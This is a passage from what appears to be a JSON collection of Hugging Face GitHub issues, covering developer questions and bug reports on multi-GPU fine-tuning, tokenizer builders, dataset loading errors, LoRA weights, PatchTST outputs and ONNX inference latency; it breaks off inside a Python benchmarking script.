Flax version (CPU?/GPU?/TPU?): not installed (NA)\r\n- Jax version: not installed\r\n- JaxLib version: not installed\r\n\r\n\r\n### Who can help?\r\n\r\n@muellerz @stevhliu \r\n\r\n### Information\r\n\r\n- [X] The official example scripts\r\n- [ ] My own modified scripts\r\n\r\n### Tasks\r\n\r\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\r\n- [X] My own task or dataset (give details below)\r\n\r\n### Reproduction\r\n\r\nn/a\r\n\r\n### Expected behavior\r\n\r\nThe `run_clm.py` and other related scripts 
in:\r\n\r\n`https://github.com/huggingface/transformers/tree/main/examples/pytorch/language-modeling`\r\n\r\nnotionally support training / fine-tuning of models whose gradients are too large to fit on a single GPU, if you believe their CLI. However there is no example showing how to actually do that.\r\n\r\nFor instance, `accelerate estimate-memory` says training the Mistral-7B family with Adam takes roughly 55 GB with float16, which is more memory than a single 40GB A100 has. So I'd need to use more than one GPU.\r\n\r\nWould it be possible to modify the language_modeling documentation to explain how to do that?\r\n\r\n", "url": "https://github.com/huggingface/transformers/issues/31323", "state": "closed", "labels": [ "Documentation" ], "created_at": "2024-06-07T18:49:35Z", "updated_at": "2024-12-02T08:11:31Z", "user": "csiefer2" }, { "repo": "huggingface/candle", "number": 2258, "title": "How to Implement New Operators Using CUDA Host Functions Along with Thrust and CUB Libraries", "body": "As stated, the CUDA code in the candle-kernels repository seems to only contain kernel functions. When I want to implement new operators (such as nonzero), it seems I'm only able to use Rust for higher-level functionality, which means I cannot utilize the device_vector from Thrust or the flagged APIs from CUB. This poses a significant challenge for implementing my algorithms. For example, to implement nonzero, it seems I would have to reimplement algorithms like exclusive_scan and scatter using the current approach?\r\n\r\nI am hoping for a better way to utilize the CUDA ecosystem!\r\n\r\nSpecifically, I'm interested in how to:\r\n\r\n1. Incorporate host functions in CUDA code to facilitate the use of libraries like Thrust and CUB.\r\n2. Effectively leverage these libraries to implement algorithms and operators that are not natively supported in the current codebase.\r\nAny guidance or best practices for achieving this would be greatly appreciated.\r\n(Translate from Chinese using LLM, Might be a little bit.. formal^_^)", "url": "https://github.com/huggingface/candle/issues/2258", "state": "open", "labels": [], "created_at": "2024-06-07T16:52:44Z", "updated_at": "2024-06-09T15:56:36Z", "user": "chenwanqq" }, { "repo": "huggingface/text-generation-inference", "number": 2035, "title": "What is TGI's graceful shutdown behavior?", "body": "When SIGKILL arrives, \r\n\r\n- does TGI process all pending inputs?\r\n- does TGI blocks incoming inputs?\r\n\r\nI saw a PR that adds graceful shutdown but it did not specify the exact program behavior. ", "url": "https://github.com/huggingface/text-generation-inference/issues/2035", "state": "closed", "labels": [], "created_at": "2024-06-07T06:24:00Z", "updated_at": "2024-06-07T08:08:51Z", "user": "seongminp" }, { "repo": "huggingface/tokenizers", "number": 1549, "title": "How to use `TokenizerBuilder`?", "body": "I expected `TokenizerBuilder` to produce a `Tokenizer` from the `build()` result, but instead `Tokenizer` wraps `TokenizerImpl`.\r\n\r\nNo problem, I see that it impl `From for Tokenizer`, but it's attempting to do quite a bit more for some reason? 
Meanwhile I cannot use `Tokenizer(unwrapped_build_result_here)` as the struct is private \ud83e\udd14 (_while the `Tokenizer::new()` method won't take this in either_)\r\n\r\n---\r\n\r\n```rs\r\nlet mut tokenizer = Tokenizer::from(TokenizerBuilder::new()\r\n .with_model(unigram)\r\n .with_decoder(Some(decoder))\r\n .with_normalizer(Some(normalizer))\r\n .build()\r\n .map_err(anyhow::Error::msg)?\r\n);\r\n```\r\n\r\n```rs\r\nerror[E0283]: type annotations needed\r\n --> mistralrs-core/src/pipeline/gguf_tokenizer.rs:139:41\r\n |\r\n139 | let mut tokenizer = Tokenizer::from(TokenizerBuilder::new()\r\n | ^^^^^^^^^^^^^^^^^^^^^ cannot infer type of the type parameter `PT` declared on the struct `TokenizerBuilder`\r\n |\r\n = note: cannot satisfy `_: tokenizers::PreTokenizer`\r\n = help: the following types implement trait `tokenizers::PreTokenizer`:\r\n tokenizers::pre_tokenizers::bert::BertPreTokenizer\r\n tokenizers::decoders::byte_level::ByteLevel\r\n tokenizers::pre_tokenizers::delimiter::CharDelimiterSplit\r\n tokenizers::pre_tokenizers::digits::Digits\r\n tokenizers::decoders::metaspace::Metaspace\r\n tokenizers::pre_tokenizers::punctuation::Punctuation\r\n tokenizers::pre_tokenizers::sequence::Sequence\r\n tokenizers::pre_tokenizers::split::Split\r\n and 4 others\r\nnote: required by a bound in `tokenizers::TokenizerBuilder::::new`\r\n --> /root/.cargo/registry/src/index.crates.io-6f17d22bba15001f/tokenizers-0.19.1/src/tokenizer/mod.rs:314:9\r\n |\r\n314 | PT: PreTokenizer,\r\n | ^^^^^^^^^^^^ required by this bound in `TokenizerBuilder::::new`\r\n...\r\n319 | pub fn new() -> Self {\r\n | --- required by a bound in this associated function\r\nhelp: consider specifying the generic arguments\r\n |\r\n139 | let mut tokenizer = Tokenizer::from(TokenizerBuilder::::new()\r\n | +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\r\n```\r\n\r\nWhy is this an issue? Isn't the point of the builder so that you don't have to specify the optional types not explicitly set?\r\n\r\n> ```\r\n> cannot infer type of the type parameter `PT` declared on the struct `TokenizerBuilder`\r\n> ```\r\n\r\nI had a glance over the source on github but didn't see an example or test for using this API and the docs don't really cover it either.\r\n\r\n---\r\n\r\nMeanwhile with `Tokenizer` instead of `TokenizerBuilder` this works:\r\n\r\n```rs\r\nlet mut tokenizer = Tokenizer::new(tokenizers::ModelWrapper::Unigram(unigram));\r\ntokenizer.with_decoder(decoder);\r\ntokenizer.with_normalizer(normalizer);\r\n```\r\n", "url": "https://github.com/huggingface/tokenizers/issues/1549", "state": "closed", "labels": [ "Stale" ], "created_at": "2024-06-07T01:18:07Z", "updated_at": "2024-07-20T01:52:03Z", "user": "polarathene" }, { "repo": "huggingface/transformers.js", "number": 796, "title": "No performance gain on using WebGPU", "body": "### Question\n\nI want to use the model: https://huggingface.co/Xenova/clip-vit-large-patch14 with WebGPU for quick inference in the browser. 
I ran the WebGPU benchmark to observe the performance increase and indeed it showed a ~7x improvement in speed on my device.\r\n\r\nBut when I run the clip model linked above, there's barely any difference between performance with and without WebGPU.", "url": "https://github.com/huggingface/transformers.js/issues/796", "state": "closed", "labels": [ "question" ], "created_at": "2024-06-06T20:16:07Z", "updated_at": "2024-06-09T01:44:17Z", "user": "mr-sarthakgupta" }, { "repo": "huggingface/optimum", "number": 1895, "title": "Lift upper version limit of transformers for habana", "body": "### Feature request\n\noptimium currently limits transformers to `>= 4.38.0, < 4.39.0`. @regisss bumped the upper version limit in PR #1851 a month ago. Is there any technical reason to limit the upper version to `< 4.39`? Other dependencies allow for more recent versions. For example neuronx allows `< 4.42.0`, see #1881.\n\n### Motivation\n\nWe would like to use newer versions of transformers and tokenizers in InstructLab. The upper version limit for optimum makes this harder on us. We need optimum-habana for Intel Gaudi support.\n\n### Your contribution\n\nI can create a PR. It's a trivial one line change.\r\n\r\nTesting is less trivial. I have access to an 8-way Gaudi 2 system, but the system is currently busy. I can do some testing in about two weeks from now after I have updated the system from 1.15.1 to 1.16.0.", "url": "https://github.com/huggingface/optimum/issues/1895", "state": "closed", "labels": [], "created_at": "2024-06-06T07:52:41Z", "updated_at": "2024-06-24T08:53:27Z", "comments": 4, "user": "tiran" }, { "repo": "huggingface/peft", "number": 1829, "title": "How to change to PEFT model dynamically?", "body": "python==3.7.12\r\nPEFT==0.3.0\r\n\r\n@BenjaminBossan \r\n\r\nI fine-tune the eleventh transformer of Bert as below:\r\n\r\n```bash\r\ntarget_modules = []\r\ntarget_modules.append(\"11.attention.self.query\")\r\ntarget_modules.append(\"11.attention.self.value\")\r\n\r\nlora_config = LoraConfig(\r\n r = self.args.lora_rank,\r\n lora_alpha = self.args.lora_alpha,\r\n target_modules = target_modules,\r\n lora_dropout = 0.05,\r\n bias = \"none\"\r\n)\r\n```\r\n\r\nAfter training for a few epochs, I also want to fine-tune the first transformer. How to achieve this?\r\n\r\n", "url": "https://github.com/huggingface/peft/issues/1829", "state": "closed", "labels": [], "created_at": "2024-06-05T13:24:40Z", "updated_at": "2024-06-06T00:37:06Z", "user": "whr819987540" }, { "repo": "huggingface/transformers.js", "number": 792, "title": "Feature request: YOLO-World/Grounding DINO (Zero shot object detection)", "body": "### Question\n\nHi!\r\n\r\nI'm trying out some of the zero shot capabilities and I've been working with the owlv2 but I was wondering, is support for yolo-world and grounding Dino coming? They seem to be faster than owlv2.\r\n\r\nThanks!", "url": "https://github.com/huggingface/transformers.js/issues/792", "state": "open", "labels": [ "question" ], "created_at": "2024-06-04T21:39:18Z", "updated_at": "2024-06-24T07:04:27Z", "user": "rogueturnip" }, { "repo": "huggingface/transformers.js", "number": 791, "title": "env.allowLocalModels and env.allowRemoteModels", "body": "### Question\n\nWhen I set env.allowLocalModels = true and look at the env object I see both \r\nenv.allowLocalModels and env.allowRemoteModels set to true. Does this mean that it will look for models locally first and then if not found go to the remoteHost? 
", "url": "https://github.com/huggingface/transformers.js/issues/791", "state": "open", "labels": [ "question" ], "created_at": "2024-06-04T17:07:38Z", "updated_at": "2024-09-15T14:00:48Z", "user": "mram0509" }, { "repo": "huggingface/diffusers", "number": 8400, "title": "how can we load model to lora from singlefile ? ", "body": " pipe.load_lora_weights(\"lora/aesthetic_anime_v1s.safetensors\")\r\n File \"Z:\\software\\python11\\Lib\\site-packages\\diffusers\\loaders\\lora.py\", line 1230, in load_lora_weights\r\n raise ValueError(\"PEFT backend is required for this method.\")\r\nValueError: PEFT backend is required for this method.\r\n\r\npipe.load_lora_weights(\"lora/aesthetic_anime_v1s.safetensors\")\r\n\r\nhow can i use this model https://civitai.com/models/295100?modelVersionId=331598\r\n\r\n", "url": "https://github.com/huggingface/diffusers/issues/8400", "state": "closed", "labels": [], "created_at": "2024-06-04T13:54:56Z", "updated_at": "2024-06-04T15:53:32Z", "user": "xalteropsx" }, { "repo": "huggingface/datasets", "number": 6953, "title": "Remove canonical datasets from docs", "body": "Remove canonical datasets from docs, now that we no longer have canonical datasets.", "url": "https://github.com/huggingface/datasets/issues/6953", "state": "closed", "labels": [ "documentation" ], "created_at": "2024-06-04T12:09:03Z", "updated_at": "2024-07-01T11:31:25Z", "comments": 1, "user": "albertvillanova" }, { "repo": "huggingface/datasets", "number": 6951, "title": "load_dataset() should load all subsets, if no specific subset is specified", "body": "### Feature request\n\nCurrently load_dataset() is forcing users to specify a subset. Example\r\n\r\n`from datasets import load_dataset\r\ndataset = load_dataset(\"m-a-p/COIG-CQIA\")`\r\n\r\n```---------------------------------------------------------------------------\r\nValueError Traceback (most recent call last)\r\n[](https://localhost:8080/#) in ()\r\n 1 from datasets import load_dataset\r\n----> 2 dataset = load_dataset(\"m-a-p/COIG-CQIA\")\r\n\r\n3 frames\r\n[/usr/local/lib/python3.10/dist-packages/datasets/builder.py](https://localhost:8080/#) in _create_builder_config(self, config_name, custom_features, **config_kwargs)\r\n 582 if not config_kwargs:\r\n 583 example_of_usage = f\"load_dataset('{self.dataset_name}', '{self.BUILDER_CONFIGS[0].name}')\"\r\n--> 584 raise ValueError(\r\n 585 \"Config name is missing.\"\r\n 586 f\"\\nPlease pick one among the available configs: {list(self.builder_configs.keys())}\"\r\n\r\nValueError: Config name is missing.\r\nPlease pick one among the available configs: ['chinese_traditional', 'coig_pc', 'exam', 'finance', 'douban', 'human_value', 'logi_qa', 'ruozhiba', 'segmentfault', 'wiki', 'wikihow', 'xhs', 'zhihu']\r\nExample of usage:\r\n\t`load_dataset('coig-cqia', 'chinese_traditional')`\r\n```\r\nThis means a dataset cannot contain all the subsets at the same time. I guess one workaround is to manually specify the subset files like in [here](https://huggingface.co/datasets/m-a-p/COIG-CQIA/discussions/1#658698b44bb41498f75c5622), which is clumsy.\r\n\r\n\r\n\n\n### Motivation\n\nIdeally, if not subset is specified, the API should just try to load all subsets. 
This makes it much easier to handle datasets w/ subsets.\n\n### Your contribution\n\nNot sure since I'm not familiar w/ the lib src.", "url": "https://github.com/huggingface/datasets/issues/6951", "state": "closed", "labels": [ "enhancement" ], "created_at": "2024-06-04T11:02:33Z", "updated_at": "2024-11-26T08:32:18Z", "comments": 5, "user": "windmaple" }, { "repo": "huggingface/datasets", "number": 6950, "title": "`Dataset.with_format` behaves inconsistently with documentation", "body": "### Describe the bug\n\nThe actual behavior of the interface `Dataset.with_format` is inconsistent with the documentation.\r\nhttps://huggingface.co/docs/datasets/use_with_pytorch#n-dimensional-arrays\r\nhttps://huggingface.co/docs/datasets/v2.19.0/en/use_with_tensorflow#n-dimensional-arrays\r\n\r\n> If your dataset consists of N-dimensional arrays, you will see that by default they are considered as nested lists.\r\n> In particular, a PyTorch formatted dataset outputs nested lists instead of a single tensor.\r\n> A TensorFlow formatted dataset outputs a RaggedTensor instead of a single tensor.\r\n\r\nBut I get a single tensor by default, which is inconsistent with the description.\r\n\r\nActually the current behavior seems more reasonable to me. Therefore, the document needs to be modified.\n\n### Steps to reproduce the bug\n\n```python\r\n>>> from datasets import Dataset\r\n>>> data = [[[1, 2],[3, 4]],[[5, 6],[7, 8]]]\r\n>>> ds = Dataset.from_dict({\"data\": data})\r\n>>> ds = ds.with_format(\"torch\")\r\n>>> ds[0]\r\n{'data': tensor([[1, 2],\r\n [3, 4]])}\r\n>>> ds = ds.with_format(\"tf\")\r\n>>> ds[0]\r\n{'data': }\r\n```\n\n### Expected behavior\n\n```python\r\n>>> from datasets import Dataset\r\n>>> data = [[[1, 2],[3, 4]],[[5, 6],[7, 8]]]\r\n>>> ds = Dataset.from_dict({\"data\": data})\r\n>>> ds = ds.with_format(\"torch\")\r\n>>> ds[0]\r\n{'data': [tensor([1, 2]), tensor([3, 4])]}\r\n>>> ds = ds.with_format(\"tf\")\r\n>>> ds[0]\r\n{'data': }\r\n```\n\n### Environment info\n\ndatasets==2.19.1\r\ntorch==2.1.0\r\ntensorflow==2.13.1", "url": "https://github.com/huggingface/datasets/issues/6950", "state": "closed", "labels": [ "documentation" ], "created_at": "2024-06-04T09:18:32Z", "updated_at": "2024-06-25T08:05:49Z", "comments": 2, "user": "iansheng" }, { "repo": "huggingface/sentence-transformers", "number": 2708, "title": "What is the training order in the multi-task learning example?", "body": "hello. In the case of multi-task learning in the example below, what is the learning order? The example below is taken from https://www.sbert.net/examples/training/quora_duplicate_questions/README.html. \r\n\r\nRegarding the dataset below, I know that the learning results are good if you learn mnrl after learning the cl dataset. Does the learning proceed sequentially like this? Or does it go the other way? Simply put, which of the three below is your learning order?\r\n1. cl -> mnrl\r\n2. mnrl -> cl\r\n3. shuffled two datasets\r\n\r\n\r\n```\r\nMulti-Task-Learning\r\n\r\n[ContrastiveLoss]\r\n(https://www.sbert.net/docs/package_reference/sentence_transformer/losses.html#sentence_transformers.losses.ContrastiveLoss) works well for pair classification, i.e., given two pairs, are these duplicates or not. 
It pushes negative pairs far away in vector space, so that the distinguishing between duplicate and non-duplicate pairs works good.\r\n\r\n\r\n[MultipleNegativesRankingLoss]\r\n(https://www.sbert.net/docs/package_reference/sentence_transformer/losses.html#sentence_transformers.losses.MultipleNegativesRankingLoss) on the other sides mainly reduces the distance between positive pairs out of large set of possible candidates. However, the distance between non-duplicate questions is not so large, so that this loss does not work that well for pair classification.\r\n\r\nIn [training_multi-task-learning.py](https://github.com/UKPLab/sentence-transformers/tree/master/examples/training/quora_duplicate_questions/training_multi-task-learning.py) I demonstrate how we can train the network with both losses. The essential code is to define both losses and to pass it to the fit method.\r\n```\r\n\r\n```py\r\n\r\nfrom datasets import load_dataset\r\nfrom sentence_transformers.losses import ContrastiveLoss, MultipleNegativesRankingLoss\r\nfrom sentence_transformers import SentenceTransformerTrainer, SentenceTransformer\r\n\r\nmodel_name = \"stsb-distilbert-base\"\r\nmodel = SentenceTransformer(model_name)\r\n\r\n# https://huggingface.co/datasets/sentence-transformers/quora-duplicates\r\nmnrl_dataset = load_dataset(\r\n \"sentence-transformers/quora-duplicates\", \"triplet\", split=\"train\"\r\n) # The \"pair\" subset also works\r\nmnrl_train_dataset = mnrl_dataset.select(range(100000))\r\nmnrl_eval_dataset = mnrl_dataset.select(range(100000, 101000))\r\n\r\nmnrl_train_loss = MultipleNegativesRankingLoss(model=model)\r\n\r\n# https://huggingface.co/datasets/sentence-transformers/quora-duplicates\r\ncl_dataset = load_dataset(\"sentence-transformers/quora-duplicates\", \"pair-class\", split=\"train\")\r\ncl_train_dataset = cl_dataset.select(range(100000))\r\ncl_eval_dataset = cl_dataset.select(range(100000, 101000))\r\n\r\ncl_train_loss = ContrastiveLoss(model=model, margin=0.5)\r\n\r\n# Create the trainer & start training\r\ntrainer = SentenceTransformerTrainer(\r\n model=model,\r\n train_dataset={\r\n \"mnrl\": mnrl_train_dataset,\r\n \"cl\": cl_train_dataset,\r\n },\r\n eval_dataset={\r\n \"mnrl\": mnrl_eval_dataset,\r\n \"cl\": cl_eval_dataset,\r\n },\r\n loss={\r\n \"mnrl\": mnrl_train_loss,\r\n \"cl\": cl_train_loss,\r\n },\r\n)\r\ntrainer.train()\r\n\r\n```\r\n", "url": "https://github.com/huggingface/sentence-transformers/issues/2708", "state": "closed", "labels": [], "created_at": "2024-06-04T07:42:37Z", "updated_at": "2024-06-04T08:29:30Z", "user": "daegonYu" }, { "repo": "huggingface/datasets", "number": 6949, "title": "load_dataset error", "body": "### Describe the bug\n\nWhy does the program get stuck when I use load_dataset method, and it still gets stuck after loading for several hours? In fact, my json file is only 21m, and I can load it in one go using open('', 'r').\n\n### Steps to reproduce the bug\n\n1. pip install datasets==2.19.2\r\n2. from datasets import Dataset, DatasetDict, NamedSplit, Split, load_dataset\r\n3. 
data = load_dataset('json', data_files='train.json')\n\n### Expected behavior\n\nIt is able to load my json correctly\n\n### Environment info\n\ndatasets==2.19.2", "url": "https://github.com/huggingface/datasets/issues/6949", "state": "closed", "labels": [], "created_at": "2024-06-04T01:24:45Z", "updated_at": "2024-07-01T11:33:46Z", "comments": 2, "user": "frederichen01" }, { "repo": "huggingface/transformers.js", "number": 789, "title": "Can I use Xenova/Phi-3-mini-4k-instruct model server side?", "body": "### Question\n\nHey there! I\u2019m trying to run Xenova/Phi-3-mini-4k-instruct model using transformers.js 2.17.2 on the server in my Node.js project, but I get an error saying that Phi-3 is not supported. Can I make it work somehow? Any ideas appreciated", "url": "https://github.com/huggingface/transformers.js/issues/789", "state": "closed", "labels": [ "question" ], "created_at": "2024-06-03T18:43:20Z", "updated_at": "2024-06-04T04:57:42Z", "user": "StepanKukharskiy" }, { "repo": "huggingface/datasets", "number": 6947, "title": "FileNotFoundError\uff1aerror when loading C4 dataset", "body": "### Describe the bug\r\n\r\ncan't load c4 datasets\r\n\r\nWhen I replace the datasets package to 2.12.2 I get raise datasets.utils.info_utils.ExpectedMoreSplits: {'train'}\r\n\r\nHow can I fix this\uff1f\r\n\r\n### Steps to reproduce the bug\r\n\r\n1.from datasets import load_dataset\r\n2.dataset = load_dataset('allenai/c4', data_files={'validation': 'en/c4-validation.00003-of-00008.json.gz'}, split='validation')\r\n3. raise FileNotFoundError(\r\nFileNotFoundError: Couldn't find a dataset script at local_path/c4_val/allenai/c4/c4.py or any data file in the same directory. Couldn't find 'allenai/c4' on the Hugging Face Hub either: FileNotFoundError: Unable to find 'hf://datasets/allenai/c4@1588ec454efa1a09f29cd18ddd04fe05fc8653a2/en/c4-validation.00003-of-00008.json.gz' with any supported extension ['.csv', '.tsv', '.json', '.jsonl', '.parquet', '.geoparquet', '.gpq', '.arrow', '.txt', '.tar', '.blp', '.bmp', '.dib', '.bufr', '.cur', '.pcx', '.dcx', '.dds', '.ps', '.eps', '.fit', '.fits', '.fli', '.flc', '.ftc', '.ftu', '.gbr', '.gif', '.grib', '.h5', '.hdf', '.png', '.apng', '.jp2', '.j2k', '.jpc', '.jpf', '.jpx', '.j2c', '.icns', '.ico', '.im', '.iim', '.tif', '.tiff', '.jfif', '.jpe', '.jpg', '.jpeg', '.mpg', '.mpeg', '.msp', '.pcd', '.pxr', '.pbm', '.pgm', '.ppm', '.pnm', '.psd', '.bw', '.rgb', '.rgba', '.sgi', '.ras', '.tga', '.icb', '.vda', '.vst', '.webp', '.wmf', '.emf', '.xbm', '.xpm', '.BLP', '.BMP', '.DIB', '.BUFR', '.CUR', '.PCX', '.DCX', '.DDS', '.PS', '.EPS', '.FIT', '.FITS', '.FLI', '.FLC', '.FTC', '.FTU', '.GBR', '.GIF', '.GRIB', '.H5', '.HDF', '.PNG', '.APNG', '.JP2', '.J2K', '.JPC', '.JPF', '.JPX', '.J2C', '.ICNS', '.ICO', '.IM', '.IIM', '.TIF', '.TIFF', '.JFIF', '.JPE', '.JPG', '.JPEG', '.MPG', '.MPEG', '.MSP', '.PCD', '.PXR', '.PBM', '.PGM', '.PPM', '.PNM', '.PSD', '.BW', '.RGB', '.RGBA', '.SGI', '.RAS', '.TGA', '.ICB', '.VDA', '.VST', '.WEBP', '.WMF', '.EMF', '.XBM', '.XPM', '.aiff', '.au', '.avr', '.caf', '.flac', '.htk', '.svx', '.mat4', '.mat5', '.mpc2k', '.ogg', '.paf', '.pvf', '.raw', '.rf64', '.sd2', '.sds', '.ircam', '.voc', '.w64', '.wav', '.nist', '.wavex', '.wve', '.xi', '.mp3', '.opus', '.AIFF', '.AU', '.AVR', '.CAF', '.FLAC', '.HTK', '.SVX', '.MAT4', '.MAT5', '.MPC2K', '.OGG', '.PAF', '.PVF', '.RAW', '.RF64', '.SD2', '.SDS', '.IRCAM', '.VOC', '.W64', '.WAV', '.NIST', '.WAVEX', '.WVE', '.XI', '.MP3', '.OPUS', '.zip']\r\n### Expected behavior\r\n\r\n\r\nThe data was 
successfully imported\r\n\r\n### Environment info\r\n\r\npython version 3.9\r\ndatasets version 2.19.2", "url": "https://github.com/huggingface/datasets/issues/6947", "state": "closed", "labels": [], "created_at": "2024-06-03T13:06:33Z", "updated_at": "2024-06-25T06:21:28Z", "comments": 15, "user": "W-215" }, { "repo": "huggingface/dataset-viewer", "number": 2878, "title": "Remove or increase the 5GB limit?", "body": "The dataset viewer shows statistics and provides filter + sort + search only for the first 5GB of each split. We are also unable to provide the exact number of rows for bigger splits.\r\n\r\nNote that we \"show\" all the rows for parquet-native datasets (i.e., we can access the rows randomly, i.e., we have pagination).\r\n\r\nShould we provide a way to increase or remove this limit?", "url": "https://github.com/huggingface/dataset-viewer/issues/2878", "state": "closed", "labels": [ "question", "feature request" ], "created_at": "2024-06-03T08:55:08Z", "updated_at": "2024-07-22T11:32:49Z", "user": "severo" }, { "repo": "huggingface/transformers", "number": 31195, "title": "How to get back the input time series after using PatchTSTForPretraining?", "body": "### System Info\n\n-\n\n### Who can help?\n\n_No response_\n\n### Information\n\n- [X] The official example scripts\n- [ ] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [ ] My own task or dataset (give details below)\n\n### Reproduction\n\nMy model is PatchTSTForPretraining(\r\n (model): PatchTSTModel(\r\n (scaler): PatchTSTScaler(\r\n (scaler): PatchTSTStdScaler()\r\n )\r\n (patchifier): PatchTSTPatchify()\r\n (masking): PatchTSTMasking()\r\n (encoder): PatchTSTEncoder(\r\n (embedder): PatchTSTEmbedding(\r\n (input_embedding): Linear(in_features=5, out_features=768, bias=True)\r\n )\r\n (positional_encoder): PatchTSTPositionalEncoding(\r\n (positional_dropout): Identity()\r\n )\r\n (layers): ModuleList(\r\n (0-11): 12 x PatchTSTEncoderLayer(\r\n (self_attn): PatchTSTAttention(\r\n (k_proj): Linear(in_features=768, out_features=768, bias=True)\r\n (v_proj): Linear(in_features=768, out_features=768, bias=True)\r\n (q_proj): Linear(in_features=768, out_features=768, bias=True)\r\n (out_proj): Linear(in_features=768, out_features=768, bias=True)\r\n )\r\n (dropout_path1): Identity()\r\n (norm_sublayer1): PatchTSTBatchNorm(\r\n (batchnorm): BatchNorm1d(768, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)\r\n )\r\n (ff): Sequential(\r\n (0): Linear(in_features=768, out_features=3072, bias=True)\r\n (1): GELUActivation()\r\n (2): Identity()\r\n (3): Linear(in_features=3072, out_features=768, bias=True)\r\n )\r\n (dropout_path3): Identity()\r\n (norm_sublayer3): PatchTSTBatchNorm(\r\n (batchnorm): BatchNorm1d(768, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)\r\n )\r\n )\r\n )\r\n )\r\n )\r\n (head): PatchTSTMaskPretrainHead(\r\n (dropout): Dropout(p=0.0, inplace=False)\r\n (linear): Linear(in_features=768, out_features=5, bias=True)\r\n )\r\n)\r\n\r\nprediction_output = model(time_series_data)\r\n\r\nOutput:\r\n\r\ntime_series_data = tensor([[[430.3000],\r\n [431.7600],\r\n [431.7600],\r\n [431.7600],\r\n [431.7600],\r\n [431.7600],\r\n [431.7600],\r\n [431.7600],\r\n [431.7600],\r\n [430.3000],\r\n [430.3000],\r\n [428.9600],\r\n [430.3000],\r\n [430.3000],\r\n [430.3000]]], device='cuda:0')\r\nprediction_output = tensor([[[[-0.2321, 0.1897, 0.4731, 0.8893, 0.6723],\r\n [-0.5465, -0.9017, 0.0778, 0.0078, 
1.3323],\r\n [ 0.4945, 0.5145, -0.5386, -0.7045, -1.5766],\r\n [ 0.2064, 0.6290, -0.8145, 1.0450, -0.2886]]]], device='cuda:0')\n\n### Expected behavior\n\nx_hat = self.head(model_output.last_hidden_state) produces output which is not consistent to the range of input time series values. I am trying to pretrain PatchTST for autoencoding. How do I get back the input time series?", "url": "https://github.com/huggingface/transformers/issues/31195", "state": "closed", "labels": [], "created_at": "2024-06-03T06:44:31Z", "updated_at": "2024-10-26T07:44:56Z", "user": "nikhilajoshy" }, { "repo": "huggingface/optimum", "number": 1885, "title": "onnx optimum ORTOptimizer inference runs slower than setfit.export_onnx runtime.InferenceSession inference", "body": "### System Info\r\n\r\nHi,\r\n\r\ni did a test between onnx optimum export + ORTOptimizer inference vs. setfit.export_onnx + onnxruntime.InferenceSession.\r\n\r\nit seems that onnx optimum ORTOptimizer inference runs slower than setfit.export_onnx runtime.InferenceSession inference\r\nany idea why is that the reason?\r\n\r\ni also changed from AutoOptimizationConfig.O2() =AutoOptimizationConfig.O4() - still onnxruntime.InferenceSession is faster.\r\n\r\nset train_model = True - to train the finetuned model before and export it.\r\ngpu: nvidia T4\r\n\r\noutput:\r\n```\r\npython setfit-onnx-optimum-example.py\r\nRepo card metadata block was not found. Setting CardData to empty.\r\nModel size (MB) - 86.68\r\nAccuracy on test set - 0.888\r\nAverage latency (ms) - 6.23 +\\- 0.51\r\nFramework not specified. Using pt to export the model.\r\nUsing the export variant default. Available variants are:\r\n - default: The default ONNX variant.\r\n\r\n***** Exporting submodel 1/1: BertModel *****\r\nUsing framework PyTorch: 2.2.1+cu121\r\nOverriding 1 configuration item(s)\r\n - use_cache -> False\r\n2024-06-02 22:27:53.640590789 [W:onnxruntime:, session_state.cc:1166 VerifyEachNodeIsAssignedToAnEp] Some nodes were not assigned to the preferred execution providers which may or may not have an negative impact on performance. e.g. ORT explicitly assigns shape related ops to CPU to improve perf.\r\n2024-06-02 22:27:53.640623671 [W:onnxruntime:, session_state.cc:1168 VerifyEachNodeIsAssignedToAnEp] Rerunning with verbose output on a non-minimal build will show node assignments.\r\n/home/zeus/miniconda3/envs/cloudspace/lib/python3.10/site-packages/optimum/onnxruntime/configuration.py:770: FutureWarning: disable_embed_layer_norm will be deprecated soon, use disable_embed_layer_norm_fusion instead, disable_embed_layer_norm_fusion is set to True.\r\n warnings.warn(\r\nOptimizing model...\r\nConfiguration saved in all-MiniLM-L6-v2_auto_opt_O2/ort_config.json\r\nOptimized model saved at: all-MiniLM-L6-v2_auto_opt_O2 (external data format: False; saved all tensor to one file: True)\r\n2024-06-02 22:27:55.548291362 [W:onnxruntime:, session_state.cc:1166 VerifyEachNodeIsAssignedToAnEp] Some nodes were not assigned to the preferred execution providers which may or may not have an negative impact on performance. e.g. 
ORT explicitly assigns shape related ops to CPU to improve perf.\r\n2024-06-02 22:27:55.548316947 [W:onnxruntime:, session_state.cc:1168 VerifyEachNodeIsAssignedToAnEp] Rerunning with verbose output on a non-minimal build will show node assignments.\r\nModel size (MB) - 86.10\r\nAccuracy on test set - 0.888\r\nAverage latency (ms) - 1.83 +\\- 0.46\r\nSpeedup: 3.40x\r\n2024-06-02 22:27:59.483816381 [W:onnxruntime:, transformer_memcpy.cc:74 ApplyImpl] 2 Memcpy nodes are added to the graph main_graph_ed6a60ecdb95455bac10d5392cf78d36 for CUDAExecutionProvider. It might have negative impact on performance (including unable to run CUDA graph). Set session_options.log_severity_level=1 to see the detail logs before this message.\r\n2024-06-02 22:27:59.485393795 [W:onnxruntime:, session_state.cc:1166 VerifyEachNodeIsAssignedToAnEp] Some nodes were not assigned to the preferred execution providers which may or may not have an negative impact on performance. e.g. ORT explicitly assigns shape related ops to CPU to improve perf.\r\n2024-06-02 22:27:59.485413289 [W:onnxruntime:, session_state.cc:1168 VerifyEachNodeIsAssignedToAnEp] Rerunning with verbose output on a non-minimal build will show node assignments.\r\nproviders: ['CUDAExecutionProvider', 'CPUExecutionProvider']\r\nModel size (MB) - 86.23\r\nAccuracy on test set - 0.888\r\nAverage latency (ms) - 1.40 +\\- 0.17\r\nSpeedup: 4.44x\r\n```\r\n\r\ncode:\r\n```\r\n# https://github.com/huggingface/setfit/blob/main/notebooks/setfit-onnx-optimum.ipynb\r\nfrom pathlib import Path\r\nfrom time import perf_counter\r\n\r\nimport evaluate\r\nimport numpy as np\r\nimport torch\r\nfrom tqdm.auto import tqdm\r\nimport os\r\n\r\nimport matplotlib.pyplot as plt\r\nimport pandas as pd\r\n\r\nfrom setfit import SetFitModel\r\nfrom setfit import 